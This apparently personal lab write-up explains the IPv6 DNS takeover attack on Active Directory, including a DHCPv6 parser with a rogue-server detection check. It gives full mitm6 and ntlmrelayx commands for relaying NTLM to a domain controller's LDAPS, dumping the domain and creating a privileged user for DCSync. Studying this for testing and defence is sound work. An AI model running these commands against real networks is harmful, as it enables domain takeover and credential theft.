IPV6 DNS takeover


Last updated 5 days ago

This attack abuses Windows hosts that work over IPv4 but still have IPv6 enabled in the adapter properties (the default). Windows prefers IPv6 over IPv4 and periodically sends DHCPv6 Solicit messages looking for configuration. That raises one question: who is the DNS server for IPv6? In most IPv4-only networks, nobody.

With this misconfiguration, an attacker can answer those DHCPv6 requests (mitm6) and hand out their own link-local address as the IPv6 DNS server. Because Windows asks the IPv6 DNS server first, the attacker now controls name resolution for the victim, in particular the lookup of the WPAD host, and can redirect the client to a fake proxy that demands NTLM authentication. That authentication is relayed to the Domain Controller over LDAP (Lightweight Directory Access Protocol) or SMB (Server Message Block).

The trigger is an event on the target network, normally a machine rebooting, a user logging on or a DHCP renew: the client picks up the attacker's DNS settings and, on its next WPAD lookup, authenticates to the attacker. Nothing privileged is needed on the attacker's side, and the relayed credential does not have to be an administrator: a relayed computer account is already enough to dump the domain's users, groups and computers over LDAP.

The attacker then waits for further credentials to be used on the network; each one is captured as NTLM (NT LAN Manager) authentication against the fake proxy.

If a relayed credential belongs to a domain administrator, ntlmrelayx uses the LDAP session to create a new user on the Domain Controller and grant it high privileges (Enterprise Admins membership, or failing that DCSync replication rights), which the attacker can then use for DCSync.

Caveat: relaying to LDAP/LDAPS only works while LDAP signing and LDAP channel binding are not enforced on the DC, and the user-creation step needs the relayed account to be able to create users (or the MachineAccountQuota to allow computer accounts). If the DC enforces channel binding, the relay is accepted but every LDAP operation fails.
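The DHCPv6 side of this is easy to miss because mitm6 hides it. The following is an added example (not code from the original page, mitm6 or impacket): a minimal DHCPv6 builder/parser that constructs the kind of Advertise mitm6 hands out (option 23, DNS servers, set to the attacker's link-local address, and option 24, the domain search list), plus a defender-side check that flags any DHCPv6 answer configuring a DNS server that is not on an allow-list. The addresses, DUIDs and transaction ID are constructed sample values; `marvel.local` is the page's lab domain.

```python
"""Added example: DHCPv6 Advertise as sent by a rogue DHCPv6 server (mitm6 style)
and a detection check for it. All IDs/addresses below are constructed."""
import ipaddress
import struct

# DHCPv6 message types and option codes (RFC 8415)
SOLICIT, ADVERTISE, REQUEST, REPLY = 1, 2, 3, 7
OPT_CLIENTID, OPT_SERVERID, OPT_DNS_SERVERS, OPT_DOMAIN_LIST = 1, 2, 23, 24


def encode_domain(name):
    """DNS wire-format name: length-prefixed labels, zero terminator."""
    out = b"".join(bytes([len(lbl)]) + lbl.encode("ascii")
                   for lbl in name.rstrip(".").split("."))
    return out + b"\x00"


def decode_domain(data, off):
    """Inverse of encode_domain; returns (name, offset after the name)."""
    labels = []
    while True:
        length = data[off]
        off += 1
        if length == 0:
            return ".".join(labels), off
        labels.append(data[off:off + length].decode("ascii"))
        off += length


def build_dhcpv6(msg_type, xid, options):
    """msg-type (1 byte) + transaction-id (3 bytes) + TLV options."""
    body = b"".join(struct.pack("!HH", code, len(p)) + p for code, p in options)
    return struct.pack("!B", msg_type) + xid.to_bytes(3, "big") + body


def parse_dhcpv6(pkt):
    """Parse a DHCPv6 message into its type, transaction id and raw options."""
    msg_type, xid = pkt[0], int.from_bytes(pkt[1:4], "big")
    options, off = [], 4
    while off + 4 <= len(pkt):
        code, length = struct.unpack("!HH", pkt[off:off + 4])
        payload = pkt[off + 4:off + 4 + length]
        if len(payload) != length:
            raise ValueError("truncated DHCPv6 option")
        options.append((code, payload))
        off += 4 + length
    return {"type": msg_type, "xid": xid, "options": options}


def dns_servers(parsed):
    """IPv6 DNS servers from option 23 (a list of 16-byte addresses)."""
    return [str(ipaddress.IPv6Address(p[i:i + 16]))
            for code, p in parsed["options"] if code == OPT_DNS_SERVERS
            for i in range(0, len(p), 16)]


def search_domains(parsed):
    """Domain search list from option 24 (concatenated wire-format names)."""
    names = []
    for code, p in parsed["options"]:
        if code == OPT_DOMAIN_LIST:
            off = 0
            while off < len(p):
                name, off = decode_domain(p, off)
                names.append(name)
    return names


def rogue_dhcpv6_findings(parsed, allowed_dns):
    """Defender check: flag ADVERTISE/REPLY messages whose DNS servers are not on
    the allow-list. On an IPv4-only network the allow-list is empty, so any DHCPv6
    answer that sets a DNS server is suspicious; a link-local DNS address is the
    typical rogue-server (mitm6) pattern and gets an extra finding."""
    findings = []
    if parsed["type"] not in (ADVERTISE, REPLY):
        return findings
    for srv in dns_servers(parsed):
        if srv not in allowed_dns:
            findings.append(f"unexpected IPv6 DNS server {srv}")
        if ipaddress.IPv6Address(srv).is_link_local:
            findings.append(f"link-local DNS server {srv} (rogue DHCPv6 pattern)")
    return findings


def sample_rogue_advertise():
    """Constructed Advertise of the kind mitm6 sends: the attacker's link-local
    address as the DNS server and the target domain as the search list."""
    attacker = ipaddress.IPv6Address("fe80::a00:27ff:fe3b:1c2d")  # constructed
    return build_dhcpv6(ADVERTISE, 0xABCDEF, [
        (OPT_CLIENTID, b"\x00\x01\x00\x01" + b"\x11" * 8),   # constructed DUID
        (OPT_SERVERID, b"\x00\x01\x00\x01" + b"\x22" * 8),   # constructed DUID
        (OPT_DNS_SERVERS, attacker.packed),
        (OPT_DOMAIN_LIST, encode_domain("marvel.local")),
    ])


if __name__ == "__main__":
    parsed = parse_dhcpv6(sample_rogue_advertise())
    print("DNS servers:", dns_servers(parsed))
    print("Search list:", search_domains(parsed))
    for finding in rogue_dhcpv6_findings(parsed, allowed_dns=set()):
        print("ALERT:", finding)
```

On the blue side the same check can be fed from a packet capture on UDP 546/547; on the red side it shows why the attack is loud: every poisoned client now carries a DNS server pointing at the attacker's link-local address, which is exactly what RA Guard / DHCPv6 Guard on switches is designed to block.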

Steps (run mitm6 only in short sprints of 5-10 minutes; leaving it running hands every host a bogus DNS server and causes outages)

  1. Start ntlmrelayx (it must be listening before mitm6 poisons anyone).

  2. Start mitm6.

  3. Wait for an event on a client (reboot, logon, DHCP renew); the resulting WPAD authentication is relayed to the DC.

  4. If an administrator's credential is relayed, ntlmrelayx creates a new privileged user, which can be used for a DCSync attack.

1. ntlmrelayx

impacket-ntlmrelayx -6 -t ldaps://192.168.138.136 -wh fakewpad.marvel.local -l lootme

| Flag / Parameter | Meaning |
| --- | --- |
| impacket-ntlmrelayx | The Impacket tool that receives NTLM authentication and relays it to another service. |
| -6 | Also listen on IPv6. Required here, because the poisoned clients reach the attacker over IPv6. |
| -t ldaps://192.168.138.136 | Relay target: the Domain Controller's LDAPS service (LDAP over TLS). LDAPS rather than plain LDAP is needed for the user-creation step, since AD only accepts a password set over an encrypted connection. |
| -wh fakewpad.marvel.local | Hostname ntlmrelayx advertises as the WPAD server. mitm6 resolves this name to the attacker; ntlmrelayx serves a PAC file that makes the attacker the client's proxy and then demands proxy authentication (HTTP 407), which the Windows client answers with NTLM. |
| -l lootme | Directory where loot is written: the domain dump (users, groups, computers, policies) made over the relayed LDAP session. |

🧠 What This Setup Is Doing:

  • Listens for NTLM authentication over IPv6 (and IPv4).

  • Relays the authentication to the LDAPS service on 192.168.138.136.

  • Uses the fake WPAD host (fakewpad.marvel.local) to make clients send NTLM authentication to the attacker's proxy.

  • Stores the dumped domain information in the lootme directory.

This is the WPAD + NTLM relay over IPv6 attack, which works in enterprise environments where clients have IPv6 enabled but no legitimate DHCPv6/IPv6 DNS server exists.

2. mitm6

Installation

sudo apt install mitm6

Launch mitm6 (-d marvel.local: only answer DNS queries for names in this domain; everything else is left alone to limit disruption)

sudo mitm6 -d marvel.local

3. Force event (restart)

Restart a client or log a user on; ntlmrelayx reports the relayed authentication as a success.

A relayed computer account is enough for ntlmrelayx to dump the domain over LDAP: the loot directory (lootme) fills with HTML, JSON and grep-able files listing computers, groups, users, trusts and the password policy. Everything is enumerated without any valid domain credentials.

DC sync attack

If an administrator logs on to a poisoned computer, the relayed authentication is used to add a new user; ntlmrelayx prints the generated username and password. The new user is added to Enterprise Admins (or given replication rights), which is enough to perform a DCSync attack. (Not working for me.)

Further reading: IPv6 DNS Takeover with MitM6: Strategies for Network Security (Redfox Security)